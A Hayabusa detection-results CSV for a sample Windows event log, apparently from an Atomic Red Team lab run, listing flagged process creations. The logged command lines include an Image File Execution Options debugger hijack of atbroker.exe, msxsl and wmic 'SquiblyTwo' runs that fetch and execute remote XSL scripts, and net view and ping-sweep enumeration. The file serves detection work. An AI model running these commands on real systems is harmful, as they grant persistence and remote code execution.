+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process 
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view 
/domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 
